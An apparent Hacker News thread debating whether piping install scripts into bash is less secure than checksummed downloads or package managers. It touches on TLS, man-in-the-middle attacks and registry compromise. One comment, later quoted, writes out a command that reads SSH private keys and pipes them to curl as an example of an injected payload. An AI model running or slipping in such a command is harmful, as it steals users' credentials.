top | item 32445248

(no title)

aspaceman | 3 years ago

"a bunch of folks do something insecure" does not speak argument.

The argument is that it is insecure. Most easily because I can inject, "cat ~/.ssh/*_rsa | curl ..." and get your company ssh keys. There's no reason rust, brew and all the rest can't provide a Download page with a checksum. They choose not to, like this project chose not to, because it doesn't look as sexy.

It's really silly.

discuss

lillecarl|3 years ago

Sure you can, but there's always going to be trust somewhere. I trust that the curl | bash examples I see are from reputable sources, and I trust their infra as much as someone else's to be safe (https protects MITM attacks). NixOS is a cool example of complete package transparency with their binary cache, if your expressions don't evaluate the same as theirs you'll build from source.

But really, curl | bash isn't the end of the world.

If they do it against a github url they also have the security of github behind you, because you can't differentiate on user agent there, which seems to be the commonly argued pitfall. Or other ways to detect you're not a browser, on a hosted platform you have someone else's security team behind your back.

qbasic_forever|3 years ago

If someone has pulled off a sophisticated enough attack to intercept your http curl of the script and inject a malicious version, why can't they also intercept your brower http requests for the download page and inject different html that gives a good hash/checksum of the malicious script?

Going even further, what is stopping a malicious attack on the package source itself--like someone gaining control of the package source and committing a malicious version (as NPM, pypi and other registries have seen)?

The point is, "use your package manager" is not any better in the grand scheme of things than blindly curling and executing a script. Neither option is perfectly secure.

nine_k|3 years ago

No, the concern is not your computer is compromised. Yours is a low-value target, sorry.

It's their http server, or a machine that feeds that http server, which is a good target for a compromise. Injecting a little bit of malicious code that steals something, or installs a fileless piece of malware, would bring massive benefits to the perpetrator, even if the exploit is short-lived.

That shell script should be a zip (gzip, xz) file, with a sha256 hash of it published on a different, separately hosted resource.

Maybe we should provide an utility that just does that in one command. It could even be a shell script...

yunohn|3 years ago

Why can’t the downloaded binary package do the exact same thing? Or do you decompile and go through those as well?

aspaceman|3 years ago

It could, but I can trust that no individual stepped in the middle of that process.

I trust Rust to not put such a thing in their binary. I do not trust an arbitrary man in the middle, and it's trivial to modify a shell script.

Without a checksum, I can't ensure the binary im piping through the shell is the binary they posted and built. Anyone can step in, modify a few lines, and get access to a large part of my system. The barrier to entry to add such capability to arbitrary binaries is outrageously high.

moondev|3 years ago

> Most easily because I can inject, "cat ~/.ssh/*_rsa | curl ..."

If you can inject that breaking TLS which secures everything on the internet, why can't you inject your own checksum on the "download page"?

zbird|3 years ago

Checksums and the binaries can be stored in different places for redundancy.